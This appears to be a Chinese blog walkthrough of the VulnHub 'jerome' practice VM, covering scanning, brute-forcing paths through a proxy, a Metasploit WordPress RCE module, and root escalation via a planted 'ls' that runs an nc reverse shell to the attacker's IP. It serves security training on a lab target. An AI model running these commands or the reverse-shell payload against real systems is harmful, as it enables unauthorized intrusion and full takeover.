vulnhub之jerome的实践

admin 2024年10月8日13:17:26评论11 views字数 1252阅读4分10秒阅读模式

本周实践的是vulnhub的jerome镜像,

下载地址,https://download.vulnhub.com/sp/jerome-v1.0.1.7z,

用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址是192.168.0.192,

vulnhub之jerome的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.192,

发现靶机仅开了8080端口的http代理服务,

vulnhub之jerome的实践

对代理服务进行路径暴破,

dirb http://127.0.0.1 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -p 192.168.0.192:8080,

获取到http://127.0.0.1/server-status,

vulnhub之jerome的实践

给firefox浏览器上FoxyProxy插件,

vulnhub之jerome的实践

浏览器访问http://127.0.0.1/server-status,

获取到靶机上还有1337端口的http服务,

vulnhub之jerome的实践

对1337端口的http服务进行路径暴破,

dirb http://127.0.0.1:1337 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -p 192.168.0.192:8080,

获取到http://127.0.0.1:1337/wordpress,

vulnhub之jerome的实践

对wordpress进行扫描,

wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.0.192:8080 -e u,获取到版本号信息和用户名,

vulnhub之jerome的实践

在msf里搜漏洞利用方法,尝试第一个,

vulnhub之jerome的实践

use exploit/multi/http/wp_crop_rce
set rhosts 127.0.0.1
set proxies http:192.168.0.192:8080
set username jerome
set password jerome
set targeturi /wordpress
set rport 1337
set ReverseAllowProxy true
set lhost 192.168.0.191
exploit

获取到msf的shell,转成普通shell,继续转成交互式shell,

vulnhub之jerome的实践

查看定时任务,cat /etc/crontab,

继续查看定时任务中的脚本文件内容,/usr/share/simulate.sh,

看到在当前用户的目录下执行了ls,

vulnhub之jerome的实践

进入当前用户的目录,cd /home/jerome,创建新的ls,

echo "nc -e /bin/bash 192.168.0.191 4455" >> ls,

修改权限,chmod 777 ls,

在kali攻击机上开启反弹shell监听,nc -lvp 4455,

等待一会儿,就获取到了反弹shell,id确认是root,

vulnhub之jerome的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之jerome的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月8日13:17:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之jerome的实践https://cn-sec.com/archives/3239368.html

发表评论

匿名网友 填写信息